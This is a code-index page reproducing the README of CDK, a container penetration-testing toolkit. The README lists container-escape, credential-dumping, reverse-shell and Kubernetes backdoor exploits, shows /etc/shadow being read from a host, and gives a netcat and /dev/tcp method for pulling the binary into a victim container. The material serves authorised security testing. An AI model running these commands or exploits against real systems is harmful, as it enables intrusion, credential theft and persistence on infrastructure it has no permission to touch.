MCPcopy Index your code
hub / github.com/cdk-team/CDK

github.com/cdk-team/CDK @v1.5.6 sqlite

repository ↗ · DeepWiki ↗ · release v1.5.6 ↗
508 symbols 1,372 edges 116 files 96 documented · 19% 28 cross-repo links
README

CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

png

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

Quick Start

Run cdk eva to get evaluate info and a recommend exploit, then run cdk run to start the attack.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Delivery

Download latest release in https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into target container in real-world penetration testing

If you have an exploit that can upload a file, then you can upload CDK binary directly.

If you have a RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
  1. Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

Features

CDK has three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: for container escaping, persistance and lateral movement
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]
Tactics Script Supported Usage/Example
Information Gathering OS Basic Info link
Information Gathering Available Capabilities link
Information Gathering Available Linux Commands link
Information Gathering Mounts link
Information Gathering Net Namespace link
Information Gathering Sensitive ENV link
Information Gathering Sensitive Process link
Information Gathering Sensitive Local Files link
Information Gathering Kube-proxy Route Localnet(CVE-2020-8558) link
Information Gathering DNS-Based Service Discovery link
Discovery K8s Api-server Info link
Discovery K8s Service-account Info link
Discovery Cloud Provider Metadata API link

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]
Tactic Technique CDK Exploit Name Supported In Thin Doc
Escaping docker-runc CVE-2019-5736 runc-pwn
Escaping containerd-shim CVE-2020-15257 shim-pwn link
Escaping docker.sock PoC (DIND attack) docker-sock-check link
Escaping docker.sock RCE docker-sock-pwn link
Escaping Docker API(2375) RCE docker-api-pwn link
Escaping Device Mount Escaping mount-disk link
Escaping LXCFS Escaping lxcfs-rw link
Escaping Cgroups Escaping mount-cgroup link
Escaping Abuse Unprivileged User Namespace Escaping CVE-2022-0492 abuse-unpriv-userns link
Escaping Procfs Escaping mount-procfs link
Escaping Ptrace Escaping PoC check-ptrace link
Escaping Rewrite Cgroup(devices.allow) rewrite-cgroup-devices link
Escaping Read arbitrary file from host system (CAP_DAC_READ_SEARCH) cap-dac-read-search link
Discovery K8s Component Probe service-probe link
Discovery Dump Istio Sidecar Meta istio-check link
Discovery Dump K8s Pod Security Policies k8s-psp-dump link
Remote Control Reverse Shell reverse-shell link
Remote Control Kubelet Exec kubelet-exec
Credential Access Registry BruteForce registry-brute link
Credential Access Access Key Scanning ak-leakage link
Credential Access Etcd Get K8s Token etcd-get-k8s-token
Credential Access Dump K8s Secrets k8s-secret-dump link
Credential Access Dump K8s Config k8s-configmap-dump link
Privilege Escalation K8s RBAC Bypass k8s-get-sa-token link
Persistence Deploy WebShell webshell-deploy link
Persistence Deploy Backdoor Pod k8s-backdoor-daemonset link
Persistence Deploy Shadow K8s api-server k8s-shadow-apiserver link
Persistence K8s MITM Attack (CVE-2020-8554) k8s-mitm-clusterip link
Persistence Deploy K8s CronJob k8s-cronjob link

Note about Thin: The thin release is prepared for

Extension points exported contracts — how you extend this code

CheckFunc (FuncType)
CheckFunc represents the executable unit for a security check.
pkg/evaluate/engine.go
TaskInterface (Interface)
(no doc) [1 implementers]
pkg/plugin/interface.go
ExploitInterface (Interface)
(no doc)
pkg/plugin/interface.go

Core symbols most depended-on inside this repo

inside_container_cmd
called by 43
test/CDK-deploy-test/lib/ssh_remote_action.py
RegisterExploit
called by 33
pkg/plugin/interface.go
String
called by 29
pkg/util/cgroup.go
ServerAccountRequest
called by 26
pkg/tool/kubectl/common.go
Close
called by 24
pkg/util/colorful.go
RegisterSimpleCheck
called by 22
pkg/evaluate/registry.go
check_host_exec
called by 21
test/CDK-deploy-test/lib/ssh_remote_action.py
logf
called by 18
pkg/tool/netcat/netcat.go

Shape

Function 291
Struct 108
Method 100
Class 5
Interface 2
FuncType 1
TypeAlias 1

Languages

Go95%
Python5%

Modules by API surface

pkg/util/kubelet_api.go26 symbols
pkg/evaluate/registry.go19 symbols
pkg/evaluate/engine.go17 symbols
pkg/plugin/interface.go14 symbols
pkg/util/cgroup.go12 symbols
pkg/tool/netcat/netcat.go12 symbols
pkg/util/colorful.go10 symbols
pkg/util/file_io.go9 symbols
pkg/exploit/escaping/mount_procfs.go9 symbols
pkg/exploit/escaping/lxcfs_rw_mknod.go9 symbols
pkg/exploit/escaping/lxcfs_rw_cgroup.go9 symbols
pkg/util/kubectl.go8 symbols

Dependencies from manifests, versioned

github.com/axgle/mahoniav0.0.0-2018020800282 · 1×
github.com/bkthomps/Venv0.5.0 · 1×
github.com/containerd/ttrpcv1.0.2 · 1×
github.com/docopt/docopt-gov0.0.0-2018011123173 · 1×
github.com/idoubi/gozv1.0.0 · 1×
github.com/kr/prettyv0.2.1 · 1×

For agents

$ claude mcp add CDK \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact